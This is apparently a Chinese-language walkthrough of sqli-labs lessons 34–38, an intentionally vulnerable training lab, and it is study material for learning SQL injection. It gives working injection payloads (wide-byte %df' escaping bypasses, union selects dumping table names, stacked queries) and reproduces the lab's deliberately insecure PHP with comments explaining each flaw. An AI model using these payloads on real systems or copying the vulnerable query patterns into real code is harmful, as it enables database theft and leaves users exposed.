 uname=admin%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+&passwd=1--+

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");


// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
        $uname1=$_POST['uname'];
        $passwd1=$_POST['passwd'];

        //echo "username before addslashes is :".$uname1 ."<br>";
        //echo "Input password before addslashes is : ".$passwd1. "<br>";

        //logging the connection parameters to a file for analysis.
        $fp=fopen('result.txt','a');            // fopen() failure is not checked
        fwrite($fp,'User Name:'.$uname1);       // the submitted credentials, password included, are written in clear to a file beside the script
        fwrite($fp,'Password:'.$passwd1."\n");
        fclose($fp);

        $uname = addslashes($uname1);           // byte-wise escaping of ' " \ NUL; not aware of the connection charset
        $passwd= addslashes($passwd1);

        //echo "username after addslashes is :".$uname ."<br>";
        //echo "Input password after addslashes is : ".$passwd;

        // connectivity
        mysql_query("SET NAMES gbk");           // server-side switch to a multi-byte charset, made after the escaping above
        @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";   // escaped values interpolated into the query (the @ suppresses nothing useful on an assignment)
        $result=mysql_query($sql);
        $row = mysql_fetch_array($result);      // a failed query is not detected here; mysql_error() is only printed in the else branch

        if($row)
        {
                //echo '<font color= "#0000ff">';

                echo "<br>";
                echo '<font color= "#FFFF00" font size = 4>';
                //echo " You Have successfully logged in\n\n " ;
                echo '<font size="3" color="#0000ff">';
                echo "<br>";
                echo 'Your Login name:'. $row['username'];
                echo "<br>";
                echo 'Your Password:' .$row['password'];   // stored password shown in clear (lab only)
                echo "<br>";
                echo "</font>";
                echo "<br>";
                echo "<br>";
                echo '<img src="../images/flag.jpg"  />';

                echo "</font>";
        }
        else
        {
                echo '<font color= "#0000ff" font size="3">';
                //echo "Try again looser";
                print_r(mysql_error());                    // raw DB error text sent to the client
                echo "</br>";
                echo "</br>";
                echo "</br>";
                echo '<img src="../images/slap.jpg" />';
                echo "</font>";
        }
}

?>

</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php

    // Echo both escaped credentials back as hints (the password in clear; lab only).
    echo sprintf('Hint: The %s you input is escaped as : %s<br>', 'Username', $uname);
    echo sprintf('Hint: The %s you input is escaped as : %s<br>', 'Password', $passwd);
?>

</font>
</div>
</body>
</html>
源码

Less-35: addslashes($string)

 ?id=1 and 0 , ?id=1 and 1 : 回显不同数字型的

?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database()--+

感觉他简单的对不起自己35题的身份,还是查一下源码吧。

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
        /**
         * 还是那个老配方
         * @param  [type] check_addslashes($string)
         */
/**
 * Wrapper around addslashes(): prefixes ' " \ and NUL with a backslash.
 * Note that this only protects a value that sits inside SQL quotes; the
 * query in this file embeds $id unquoted, where quote escaping changes
 * nothing.  An integer cast or a bound parameter is the fix there.
 *
 * @param string $string raw request value
 * @return string escaped copy
 */
function check_addslashes($string)
{
    return addslashes($string);
}

// take the variables
if(isset($_GET['id']))
{
    $id=check_addslashes($_GET['id']);   // only quote characters are escaped
    //echo "The filtered request is :" .$id . "<br>";

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');         // raw request value appended to a file beside the script; fopen() failure is not checked
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity

    mysql_query("SET NAMES gbk");
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";   // $id is NOT quoted: addslashes() gives no protection in a numeric context; cast to int or bind a parameter instead
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);   // a failed query is not detected here; mysql_error() is only printed in the else branch

    if($row)
    {
        echo '<font color= "#00FF00">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];   // stored password shown in clear (lab only)
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());                    // raw DB error text sent to the client
        echo "</font>";
    }
}
else 
{ 
    echo "Please input the ID as parameter with numeric value";
}

?>

查完源码后,没错,哥就这么简单Orz。


Less-36:mysql_real_escape_string()

?id=1%df' and 0--+ , ?id=1%df' and 1--+ : 单引号闭合,根据回显可以看出有过滤

?id=0%df' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

/**
 * Escape $string for use inside a quoted SQL literal with
 * mysql_real_escape_string().  Affected bytes: \x00, \n, \r, \, ', " and
 * \x1a.  On success the escaped string is returned; on failure the driver
 * returns false (it needs an open connection), which is passed through.
 *
 * The escaping uses the charset the client library believes is active.
 * The "SET NAMES gbk" issued later in this file changes only the server
 * side, so mysql_set_charset() -- or prepared statements -- is what real
 * code should use.
 *
 * @param string $string raw request value
 * @return string|false
 */
function check_quotes($string)
{
    return mysql_real_escape_string($string);
}

// take the variables
if(isset($_GET['id']))
{
    $id=check_quotes($_GET['id']);   // escaped with the charset the client library currently has, BEFORE the SET NAMES below
    //echo "The filtered request is :" .$id . "<br>";

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');     // raw request value appended to a file beside the script; fopen() failure is not checked
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity

    mysql_query("SET NAMES gbk");    // server-side only; mysql_set_charset() is the call that keeps mysql_real_escape_string() in sync
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   // escaped value interpolated into the query; the escaping is the only barrier
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);   // a failed query is not detected here; mysql_error() is only printed in the else branch

    if($row)
    {
        echo '<font color= "#00FF00">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];   // stored password shown in clear (lab only)
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());                    // raw DB error text sent to the client
        echo "</font>";
    }
}
        else { echo "Please input the ID as parameter with numeric value";}


?>

<?php
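/**
 * Hex-encode every byte of $string, two lowercase digits per byte.
 *
 * bin2hex() replaces the per-byte dechex(ord()) loop because dechex() does
 * not zero-pad: bytes below 0x10 produced a single digit, so for example
 * "\x01\x23" and "\x12\x03" could not be told apart in the hint output.
 *
 * @param string $string arbitrary bytes
 * @return string hex representation, empty for an empty input
 */
function strToHex($string)
{
    return bin2hex($string);
}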
// Echo the escaped id back as a hint, followed by its byte-wise hex dump.
$escapedHint = "Hint: The Query String you input is escaped as : " . $id . "<br>";
$hexHint = "The Query String you input in Hex becomes : " . strToHex($id);
echo $escapedHint;
echo $hexHint;
?>

Less-37:

 uname=admin%df' or 1--+&passwd=admin&submit=Submit  , uname=admin%df' or 0--+&passwd=admin&submit=Submit :回显不同单引号闭合

 uname=admin%df' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+&passwd=admin&submit=Submit

 Less-38: 

?id=1' and 1--+ , ?id=1' and 0--+ :回显不同单引号闭合

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

<?php
    error_reporting(0);                          // hides every PHP notice and warning, including those raised by the raw query below
    include("../sql-connections/db-creds.inc");  // presumably defines the $host/$dbuser/$dbpass/$dbname used by mysqli_connect() below -- confirm
?>

<?php

// take the variables
if(isset($_GET['id']))
{
    $id=$_GET['id'];                   // raw, never escaped
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');       // raw request value appended to a file beside the script; fopen() failure is not checked
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);   // credentials expected from the include above -- confirm
    // Check connection
    if (mysqli_connect_errno($con1))
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();   // no exit: execution falls through to the query below
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
    }

    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   // INJECTION POINT: $id interpolated with no escaping or binding
    /* execute multi query */
    // mysqli_multi_query() runs every ';'-separated statement in $sql, so the
    // injected text can append whole statements (the "stacked query" of this
    // lesson).  mysqli_query() with a prepared statement executes exactly one.
    if (mysqli_multi_query($con1, $sql))
    {

        /* store first result set */
        if ($result = mysqli_store_result($con1))
        {
            if($row = mysqli_fetch_row($result))
            {
                echo '<font size = "5" color= "#00FF00">';
                printf("Your Username is : %s", $row[1]);
                echo "<br>";
                printf("Your Password is : %s", $row[2]);   // stored password shown in clear (lab only)
                echo "<br>";
                echo "</font>";
            }
    //            mysqli_free_result($result);
        }
            /* print divider */
        // Only the first result set is ever fetched: the mysqli_next_result()
        // loop is commented out, so any further statements run without output.
        if (mysqli_more_results($con1))
        {
                //printf("-----------------\n");
        }
         //while (mysqli_next_result($con1));
    }
    else
    {
        echo '<font size="5" color= "#FFFF00">';
        print_r(mysqli_error($con1));              // raw DB error text sent to the client
        echo "</font>";
    }

    /* close connection */
    mysqli_close($con1);

}
else
{ 
    echo "Please input the ID as parameter with numeric value";
}

?>
老套路只是没有回显
